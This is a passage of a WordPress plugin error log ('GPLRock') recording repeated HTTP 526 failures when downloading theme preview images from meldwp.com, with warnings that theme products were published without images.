https://meldwp.com/wp-content/uploads/muji--beauty-shop--spa-salon-wordpress-theme-23463.webp [06-Apr-2026 17:42:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: muji-beauty-shop-spa-salon-wordpress-theme [06-Apr-2026 17:42:43 UTC] GPLRock: Image download failed for product clenix-cleaning-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:45 UTC] GPLRock: Image download failed for product clenix-cleaning-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clenix---cleaning-services-wordpress-theme-9270.webp for product clenix-cleaning-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:42:47 UTC] GPLRock: Image download failed for product clenix-cleaning-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:49 UTC] GPLRock: Image download failed for product clenix-cleaning-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clenix---cleaning-services-wordpress-theme-9270.webp for product clenix-cleaning-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:42:51 UTC] GPLRock WARNING: Image download failed for product clenix-cleaning-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/clenix---cleaning-services-wordpress-theme-9270.webp [06-Apr-2026 17:42:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: clenix-cleaning-services-wordpress-theme [06-Apr-2026 17:42:52 UTC] GPLRock: Image download failed for product conexi-taxi-booking-service-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:54 UTC] GPLRock: Image download failed for product conexi-taxi-booking-service-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conexi---taxi-booking-service-wordpress-theme--rtl-20529.webp for product conexi-taxi-booking-service-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:42:56 UTC] GPLRock: Image download failed for product conexi-taxi-booking-service-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:58 UTC] GPLRock: Image download failed for product conexi-taxi-booking-service-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conexi---taxi-booking-service-wordpress-theme--rtl-20529.webp for product conexi-taxi-booking-service-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:00 UTC] GPLRock WARNING: Image download failed for product conexi-taxi-booking-service-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/conexi---taxi-booking-service-wordpress-theme--rtl-20529.webp [06-Apr-2026 17:43:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: conexi-taxi-booking-service-wordpress-theme-rtl [06-Apr-2026 17:43:00 UTC] GPLRock: Image download failed for product plantish-gardening-houseplants-responsive-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:02 UTC] GPLRock: Image download failed for product plantish-gardening-houseplants-responsive-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plantish---gardening--houseplants-responsive-woocommerce-theme-2174.webp for product plantish-gardening-houseplants-responsive-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:05 UTC] GPLRock: Image download failed for product plantish-gardening-houseplants-responsive-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:07 UTC] GPLRock: Image download failed for product plantish-gardening-houseplants-responsive-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plantish---gardening--houseplants-responsive-woocommerce-theme-2174.webp for product plantish-gardening-houseplants-responsive-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:09 UTC] GPLRock WARNING: Image download failed for product plantish-gardening-houseplants-responsive-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/plantish---gardening--houseplants-responsive-woocommerce-theme-2174.webp [06-Apr-2026 17:43:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: plantish-gardening-houseplants-responsive-woocommerce-theme [06-Apr-2026 17:43:09 UTC] GPLRock: Image download failed for product topspin-tennis-school-sports-club-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:11 UTC] GPLRock: Image download failed for product topspin-tennis-school-sports-club-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/topspin--tennis-school--sports-club-fse-wordpress-theme-27924.webp for product topspin-tennis-school-sports-club-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:13 UTC] GPLRock: Image download failed for product topspin-tennis-school-sports-club-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:16 UTC] GPLRock: Image download failed for product topspin-tennis-school-sports-club-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/topspin--tennis-school--sports-club-fse-wordpress-theme-27924.webp for product topspin-tennis-school-sports-club-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:18 UTC] GPLRock WARNING: Image download failed for product topspin-tennis-school-sports-club-fse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/topspin--tennis-school--sports-club-fse-wordpress-theme-27924.webp [06-Apr-2026 17:43:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: topspin-tennis-school-sports-club-fse-wordpress-theme [06-Apr-2026 17:43:18 UTC] GPLRock: Image download failed for product govtpress-municipal-and-government-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:20 UTC] GPLRock: Image download failed for product govtpress-municipal-and-government-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/govtpress---municipal-and-government-wordpress-theme--rtl-2268.webp for product govtpress-municipal-and-government-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:22 UTC] GPLRock: Image download failed for product govtpress-municipal-and-government-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:24 UTC] GPLRock: Image download failed for product govtpress-municipal-and-government-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/govtpress---municipal-and-government-wordpress-theme--rtl-2268.webp for product govtpress-municipal-and-government-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:26 UTC] GPLRock WARNING: Image download failed for product govtpress-municipal-and-government-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/govtpress---municipal-and-government-wordpress-theme--rtl-2268.webp [06-Apr-2026 17:43:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: govtpress-municipal-and-government-wordpress-theme-rtl [06-Apr-2026 17:43:27 UTC] GPLRock: Image download failed for product pawly-responsive-pet-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:29 UTC] GPLRock: Image download failed for product pawly-responsive-pet-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pawly--responsive-pet-store-woocommerce-theme-22853.webp for product pawly-responsive-pet-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:31 UTC] GPLRock: Image download failed for product pawly-responsive-pet-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:33 UTC] GPLRock: Image download failed for product pawly-responsive-pet-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pawly--responsive-pet-store-woocommerce-theme-22853.webp for product pawly-responsive-pet-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:35 UTC] GPLRock WARNING: Image download failed for product pawly-responsive-pet-store-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/pawly--responsive-pet-store-woocommerce-theme-22853.webp [06-Apr-2026 17:43:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pawly-responsive-pet-store-woocommerce-theme [06-Apr-2026 17:43:35 UTC] GPLRock: Image download failed for product oxpins-non-profit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:37 UTC] GPLRock: Image download failed for product oxpins-non-profit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oxpins---non-profit-charity-wordpress-theme-17670.webp for product oxpins-non-profit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:39 UTC] GPLRock: Image download failed for product oxpins-non-profit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:42 UTC] GPLRock: Image download failed for product oxpins-non-profit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oxpins---non-profit-charity-wordpress-theme-17670.webp for product oxpins-non-profit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:44 UTC] GPLRock WARNING: Image download failed for product oxpins-non-profit-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oxpins---non-profit-charity-wordpress-theme-17670.webp [06-Apr-2026 17:43:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oxpins-non-profit-charity-wordpress-theme [06-Apr-2026 17:43:44 UTC] GPLRock: Image download failed for product doctery-hospital-and-healthcare-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:46 UTC] GPLRock: Image download failed for product doctery-hospital-and-healthcare-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doctery---hospital-and-healthcare-wordpress-theme--rtl-24559.webp for product doctery-hospital-and-healthcare-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:48 UTC] GPLRock: Image download failed for product doctery-hospital-and-healthcare-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:50 UTC] GPLRock: Image download failed for product doctery-hospital-and-healthcare-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:43:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doctery---hospital-and-healthcare-wordpress-theme--rtl-24559.webp for product doctery-hospital-and-healthcare-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:43:52 UTC] GPLRock WARNING: Image download failed for product doctery-hospital-and-healthcare-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/doctery---hospital-and-healthcare-wordpress-theme--rtl-24559.webp [06-Apr-2026 17:43:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: doctery-hospital-and-healthcare-wordpress-theme-rtl [06-Apr-2026 18:05:35 UTC] GPLRock: Image download failed for product digeco-startup-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:37 UTC] GPLRock: Image download failed for product digeco-startup-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digeco--startup-agency-wordpress-theme-5092.webp for product digeco-startup-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:05:39 UTC] GPLRock: Image download failed for product digeco-startup-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:41 UTC] GPLRock: Image download failed for product digeco-startup-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digeco--startup-agency-wordpress-theme-5092.webp for product digeco-startup-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:05:43 UTC] GPLRock WARNING: Image download failed for product digeco-startup-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/digeco--startup-agency-wordpress-theme-5092.webp [06-Apr-2026 18:05:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: digeco-startup-agency-wordpress-theme [06-Apr-2026 18:05:43 UTC] GPLRock: Image download failed for product terra-startup-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:45 UTC] GPLRock: Image download failed for product terra-startup-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/terra---startup--technology-wordpress-theme-31347.webp for product terra-startup-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:05:48 UTC] GPLRock: Image download failed for product terra-startup-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:50 UTC] GPLRock: Image download failed for product terra-startup-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/terra---startup--technology-wordpress-theme-31347.webp for product terra-startup-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:05:52 UTC] GPLRock WARNING: Image download failed for product terra-startup-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/terra---startup--technology-wordpress-theme-31347.webp [06-Apr-2026 18:05:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: terra-startup-technology-wordpress-theme [06-Apr-2026 18:05:52 UTC] GPLRock: Image download failed for product oworganic-multipurpose-sections-shopify-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:54 UTC] GPLRock: Image download failed for product oworganic-multipurpose-sections-shopify-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oworganic---multipurpose-sections-shopify-theme-13988.webp for product oworganic-multipurpose-sections-shopify-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:05:56 UTC] GPLRock: Image download failed for product oworganic-multipurpose-sections-shopify-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:05:58 UTC] GPLRock: Image download failed for product oworganic-multipurpose-sections-shopify-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oworganic---multipurpose-sections-shopify-theme-13988.webp for product oworganic-multipurpose-sections-shopify-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:00 UTC] GPLRock WARNING: Image download failed for product oworganic-multipurpose-sections-shopify-theme. URL: https://meldwp.com/wp-content/uploads/oworganic---multipurpose-sections-shopify-theme-13988.webp [06-Apr-2026 18:06:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oworganic-multipurpose-sections-shopify-theme [06-Apr-2026 18:06:01 UTC] GPLRock: Image download failed for product norge-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:03 UTC] GPLRock: Image download failed for product norge-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/norge---blog-wordpress-theme-25133.webp for product norge-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:05 UTC] GPLRock: Image download failed for product norge-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:07 UTC] GPLRock: Image download failed for product norge-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/norge---blog-wordpress-theme-25133.webp for product norge-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:09 UTC] GPLRock WARNING: Image download failed for product norge-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/norge---blog-wordpress-theme-25133.webp [06-Apr-2026 18:06:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: norge-blog-wordpress-theme [06-Apr-2026 18:06:09 UTC] GPLRock: Image download failed for product lamaro-yacht-club-and-rental-boat-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:11 UTC] GPLRock: Image download failed for product lamaro-yacht-club-and-rental-boat-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lamaro---yacht-club-and-rental-boat-service-wordpress-theme-10647.webp for product lamaro-yacht-club-and-rental-boat-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:14 UTC] GPLRock: Image download failed for product lamaro-yacht-club-and-rental-boat-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:16 UTC] GPLRock: Image download failed for product lamaro-yacht-club-and-rental-boat-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lamaro---yacht-club-and-rental-boat-service-wordpress-theme-10647.webp for product lamaro-yacht-club-and-rental-boat-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:18 UTC] GPLRock WARNING: Image download failed for product lamaro-yacht-club-and-rental-boat-service-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lamaro---yacht-club-and-rental-boat-service-wordpress-theme-10647.webp [06-Apr-2026 18:06:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lamaro-yacht-club-and-rental-boat-service-wordpress-theme [06-Apr-2026 18:06:18 UTC] GPLRock: Image download failed for product e-learn-onepage-bootstrap-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:20 UTC] GPLRock: Image download failed for product e-learn-onepage-bootstrap-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/e-learn---onepage-bootstrap-education-wordpress-theme-2108.webp for product e-learn-onepage-bootstrap-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:22 UTC] GPLRock: Image download failed for product e-learn-onepage-bootstrap-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:24 UTC] GPLRock: Image download failed for product e-learn-onepage-bootstrap-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/e-learn---onepage-bootstrap-education-wordpress-theme-2108.webp for product e-learn-onepage-bootstrap-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:26 UTC] GPLRock WARNING: Image download failed for product e-learn-onepage-bootstrap-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/e-learn---onepage-bootstrap-education-wordpress-theme-2108.webp [06-Apr-2026 18:06:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: e-learn-onepage-bootstrap-education-wordpress-theme [06-Apr-2026 18:06:27 UTC] GPLRock: Image download failed for product crafto-ai-powered-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:29 UTC] GPLRock: Image download failed for product crafto-ai-powered-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crafto---ai-powered-multipurpose-wordpress-theme-25157.webp for product crafto-ai-powered-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:31 UTC] GPLRock: Image download failed for product crafto-ai-powered-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:33 UTC] GPLRock: Image download failed for product crafto-ai-powered-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crafto---ai-powered-multipurpose-wordpress-theme-25157.webp for product crafto-ai-powered-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:35 UTC] GPLRock WARNING: Image download failed for product crafto-ai-powered-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/crafto---ai-powered-multipurpose-wordpress-theme-25157.webp [06-Apr-2026 18:06:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crafto-ai-powered-multipurpose-wordpress-theme [06-Apr-2026 18:06:35 UTC] GPLRock: Image download failed for product maco-gym-and-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:37 UTC] GPLRock: Image download failed for product maco-gym-and-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maco--gym-and-fitness-wordpress-theme-29124.webp for product maco-gym-and-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:40 UTC] GPLRock: Image download failed for product maco-gym-and-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:42 UTC] GPLRock: Image download failed for product maco-gym-and-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maco--gym-and-fitness-wordpress-theme-29124.webp for product maco-gym-and-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:44 UTC] GPLRock WARNING: Image download failed for product maco-gym-and-fitness-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/maco--gym-and-fitness-wordpress-theme-29124.webp [06-Apr-2026 18:06:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maco-gym-and-fitness-wordpress-theme [06-Apr-2026 18:06:44 UTC] GPLRock: Image download failed for product historypress-wordpress-theme-for-history-sites-enthusiasts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:46 UTC] GPLRock: Image download failed for product historypress-wordpress-theme-for-history-sites-enthusiasts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/historypress---wordpress-theme-for-history-sites--enthusiasts-11245.webp for product historypress-wordpress-theme-for-history-sites-enthusiasts after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:48 UTC] GPLRock: Image download failed for product historypress-wordpress-theme-for-history-sites-enthusiasts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:50 UTC] GPLRock: Image download failed for product historypress-wordpress-theme-for-history-sites-enthusiasts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/historypress---wordpress-theme-for-history-sites--enthusiasts-11245.webp for product historypress-wordpress-theme-for-history-sites-enthusiasts after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:52 UTC] GPLRock WARNING: Image download failed for product historypress-wordpress-theme-for-history-sites-enthusiasts. URL: https://meldwp.com/wp-content/uploads/historypress---wordpress-theme-for-history-sites--enthusiasts-11245.webp [06-Apr-2026 18:06:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: historypress-wordpress-theme-for-history-sites-enthusiasts [06-Apr-2026 18:06:52 UTC] GPLRock: Image download failed for product jrny-a-gorgeous-responsive-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:55 UTC] GPLRock: Image download failed for product jrny-a-gorgeous-responsive-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jrny-a-gorgeous--responsive-wordpress-blog-theme-20523.webp for product jrny-a-gorgeous-responsive-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:06:57 UTC] GPLRock: Image download failed for product jrny-a-gorgeous-responsive-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:06:59 UTC] GPLRock: Image download failed for product jrny-a-gorgeous-responsive-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:07:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jrny-a-gorgeous--responsive-wordpress-blog-theme-20523.webp for product jrny-a-gorgeous-responsive-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:07:01 UTC] GPLRock WARNING: Image download failed for product jrny-a-gorgeous-responsive-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/jrny-a-gorgeous--responsive-wordpress-blog-theme-20523.webp [06-Apr-2026 18:07:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jrny-a-gorgeous-responsive-wordpress-blog-theme [06-Apr-2026 18:09:37 UTC] GPLRock: Image download failed for product qrowd-crowdfunding-projects-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:09:39 UTC] GPLRock: Image download failed for product qrowd-crowdfunding-projects-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:09:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qrowd---crowdfunding-projects--charity-wordpress-theme-2168.webp for product qrowd-crowdfunding-projects-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:09:41 UTC] GPLRock: Image download failed for product qrowd-crowdfunding-projects-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:09:43 UTC] GPLRock: Image download failed for product qrowd-crowdfunding-projects-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:09:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qrowd---crowdfunding-projects--charity-wordpress-theme-2168.webp for product qrowd-crowdfunding-projects-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:09:45 UTC] GPLRock WARNING: Image download failed for product qrowd-crowdfunding-projects-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/qrowd---crowdfunding-projects--charity-wordpress-theme-2168.webp [06-Apr-2026 18:09:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: qrowd-crowdfunding-projects-charity-wordpress-theme [06-Apr-2026 18:09:45 UTC] GPLRock: Image download failed for product agreek-agriculture-organic-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:09:47 UTC] GPLRock: Image download failed for product agreek-agriculture-organic-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:09:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agreek---agriculture--organic-food-wordpress-theme-28976.webp for product agreek-agriculture-organic-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:09:49 UTC] GPLRock: Image download failed for product agreek-agriculture-organic-food-wordpress-theme (attempt 1/3). 